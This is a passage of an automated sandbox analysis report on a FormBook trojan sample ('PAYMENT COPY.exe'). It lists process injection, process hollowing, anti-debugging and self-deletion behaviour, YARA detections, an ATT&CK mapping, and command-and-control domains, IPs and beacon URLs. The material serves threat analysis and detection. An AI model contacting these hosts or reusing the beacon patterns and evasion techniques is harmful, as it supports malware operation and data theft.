          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04DA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04DA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.sportfest40.com
          Source: C:\Windows\explorer.exe | Network Connect: 35.244.230.236 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.kakavjesajt.com
          Source: C:\Windows\explorer.exe | Domain query: www.nescleanups.com
          Source: C:\Windows\explorer.exe | Domain query: www.llmav.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 23.225.41.92 80
          Source: C:\Windows\explorer.exe | Network Connect: 52.79.124.173 80
          Source: C:\Windows\explorer.exe | Domain query: www.stripepayment.online
          Source: C:\Windows\explorer.exe | Network Connect: 176.104.107.18 80
          Source: C:\Windows\explorer.exe | Domain query: www.beyoncos.com
          Source: C:\Windows\explorer.exe | Domain query: www.35efb510815e.com
          Source: C:\Windows\explorer.exe | Network Connect: 167.114.6.31 80
          Source: C:\Windows\explorer.exe | Domain query: www.360caiyin.com
          Source: C:\Windows\explorer.exe | Domain query: www.mg-izkerr8.net
          Source: C:\Windows\explorer.exe | Network Connect: 14.129.120.32 80
          Source: C:\Windows\explorer.exe | Domain query: www.cursosdigitaisbr.com
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.28.135 80
          Source: C:\Windows\explorer.exe | Domain query: www.cjaccessories.net
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: unknown target: C:\Users\user\Desktop\PAYMENT COPY.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: FF0000
          Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 3 | Input Capture 1 | Security Software Discovery 141 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Behavior Graph ID: 385291 | Sample: PAYMENT COPY.exe | Startdate: 12/04/2021 | Architecture: WINDOWS | Score: 100
          Start
            • www.mg-izkerr8.net
            • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            • Found malware configuration
            • Malicious sample detected (through community Yara rule)
            • 9 other signatures
            • PAYMENT COPY.exe 18 (started)
              • C:\Users\user\AppData\Local\Temp\...\ek0j.dll, PE32 (dropped)
              • Maps a DLL or memory area into another process
              • PAYMENT COPY.exe (started)
                • Modifies the context of a thread in another process (thread injection)
                • Maps a DLL or memory area into another process
                • Sample uses process hollowing technique
                • Queues an APC in another process (thread injection)
                • explorer.exe (injected)
                  • cursosdigitaisbr.com 167.114.6.31, 49742, 80 OVHFR Canada
                  • kakavjesajt.com 176.104.107.18, 49730, 80 NINETRS Serbia
                  • 13 other IPs or domains
                  • System process connects to network (likely due to code injection or exploit)
                  • Performs DNS queries to domains with low reputation
                  • msdt.exe (started)
                    • Modifies the context of a thread in another process (thread injection)
                    • Maps a DLL or memory area into another process
                    • Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe 1 (started)
                      • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PAYMENT COPY.exe | 32% | Virustotal |
          PAYMENT COPY.exe | 27% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll | 4% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.1.PAYMENT COPY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.msdt.exe.51e7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.PAYMENT COPY.exe.2650000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.msdt.exe.e45378.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.2.PAYMENT COPY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.beyoncos.com | 0% | Virustotal |
          kakavjesajt.com | 0% | Virustotal |
          www.sportfest40.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe
          http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe
          http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://181ue.com/sq.html?entry= | 0% | Avira URL Cloud | safe
          www.cursosdigitaisbr.com/eqas/ | 100% | Avira URL Cloud | malware
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 | 100% | Avira URL Cloud | malware
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          https://www.8dq98.com/enter/index.html | 0% | Avira URL Cloud | safe
          http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.beyoncos.com | 14.129.120.32 | true | true | | unknown
          kakavjesajt.com | 176.104.107.18 | true | true | | unknown
          www.sportfest40.com | 104.21.28.135 | true | true | | unknown
          www.mg-izkerr8.net | 52.79.124.173 | true | true | | unknown
          www.llmav.xyz | 35.244.230.236 | true | false | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          cursosdigitaisbr.com | 167.114.6.31 | true | true | | unknown
          34.anxin58.com | 23.225.41.92 | true | true | | unknown
          www.35efb510815e.com | unknown | unknown | true | | unknown
          www.360caiyin.com | unknown | unknown | true | | unknown
          www.kakavjesajt.com | unknown | unknown | true | | unknown
          www.nescleanups.com | unknown | unknown | true | | unknown
          www.cursosdigitaisbr.com | unknown | unknown | true | | unknown
          www.stripepayment.online | unknown | unknown | true | | unknown
          www.cjaccessories.net | unknown | unknown | true | | unknown

                                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: safe | unknown
          http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: safe | unknown
          http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: safe | unknown
          http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: safe | unknown
          www.cursosdigitaisbr.com/eqas/ | true | Avira URL Cloud: malware | low
          http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: malware | unknown
          http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 | true | Avira URL Cloud: safe | unknown
          http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 | false | Avira URL Cloud: safe | unknown

                                  URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.netDexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://181ue.com/sq.html?entry=msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://hm.baidu.com/hm.js?msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.8dq98.com/enter/index.htmlmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

Contacted IPs

[Map of contacted IPs by country; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, > 75%]

                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.104.107.18 | kakavjesajt.com | Serbia | 198371 | NINETRS | true
167.114.6.31 | cursosdigitaisbr.com | Canada | 16276 | OVHFR | true
35.244.230.236 | www.llmav.xyz | United States | 15169 | GOOGLEUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
14.129.120.32 | www.beyoncos.com | Korea Republic of | 9286 | KINXIDC-AS-KRKINXKR | true
104.21.28.135 | www.sportfest40.com | United States | 13335 | CLOUDFLARENETUS | true
23.225.41.92 | 34.anxin58.com | United States | 40065 | CNSERVERSUS | true
52.79.124.173 | www.mg-izkerr8.net | United States | 16509 | AMAZON-02US | true

                                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385291
Start date: 12.04.2021
Start time: 09:43:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PAYMENT COPY.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@12/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.5% (good quality ratio 20.3%)
• Quality average: 74%
• Quality standard deviation: 31.4%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
